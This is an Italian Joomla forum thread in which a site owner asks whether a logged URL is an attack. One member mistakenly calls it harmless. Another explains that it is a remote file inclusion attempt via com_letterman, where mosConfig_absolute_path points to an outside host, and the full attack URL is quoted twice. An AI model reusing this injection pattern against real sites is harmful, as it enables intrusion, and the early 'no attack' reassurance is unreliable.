Tentativo di hackeraggio?

[JoomLena]

Qualcuno mi sa dire se questo e un tentativo di hackeraggio?

http://www.feudolampiasi.it/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ezy-hosts.com/pages/posting???

[= odino =]

   diciamo che non cercava un URL specifica del tuo sito 

[JoomLena]

che vuoldire?
 

[ventus85]

Ti spiego con un esempio:
hai il componente X che fa Y. Tra le configurazioni di questo componente te imposti che sia visibile solo agli iscritti al sito.
Allora se il visitatore (non iscritto) Pippo clicca sul link di quel componente compare quella scritta.

Caso semplice: un forum. Nel menù principale hai il link "forum" e nelle impostazioni del forum c'è scritto che è visibile solo agli iscritti. In tal caso ti viene la scritta "Questo forum è aperto solo agli utenti registrati e loggati.
Se sei già registrato, per favore loggati. ".

E' la stessa cosa che è successo a te.

Stessa cosa succede se un utente clicca sul link di un contenuto statico che però te hai sospeso (non più pubblicato).

Tranquillo, non c'è nessun attacco.

Causa di questo può essere un contenuto non più pubblicato o diritti non concessi a tutti gli utenti.

[= odino =]

Ventus, sei sicura?

[ventus85]

Ventus, sei sicura?

In che senso?


Il mio era un esempio per fargli capire che messaggi come quello non sono di potenziali attacchi ma soltanto "chiamate" ad url che in verità "non hanno destinazione".

[JoomLena]

ok azie mille spero di poter stare tranquillo.... 

[= odino =]

Ventus, sei sicura?

In che senso?


Il mio era un esempio per fargli capire che messaggi come quello non sono di potenziali attacchi ma soltanto "chiamate" ad url che in verità "non hanno destinazione".

nel senso che guardando qua la situazione si schiarisce, chi ha digitato quell'URL non l'ha fatto di certo in maniera benevola

[ventus85]

 

Grazie per l'utile informazione.

[= odino =]

Grazie per l'utile informazione.

Ti avviso che la segnalazione della vurnerabilità l'ho trovata stamattina.

Però andando a rigor di logica:

Codice: [Seleziona]

http://www.feudolampiasi.it/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ezy-hosts.com/pages/posting???
*** lo traduciamo con ***

Sul dominio

Codice: [Seleziona]

http://www.feudolampiasi.it/index.php
attraverso il componente letterman

Codice: [Seleziona]

?option=com_letterman&task=view&Itemid=&
imposta la root / path del sito:

Codice: [Seleziona]

mosConfig_absolute_path

come segue:

Codice: [Seleziona]

http://www.ezy-hosts.com/pages/posting???
***
---
***

Sottolineo che quella vulnerabilità non dovrebbe creare più problemi ora, affliggeva vecchie verisoni di Joomla! a quanto ho capito ( grazie al com_letterman).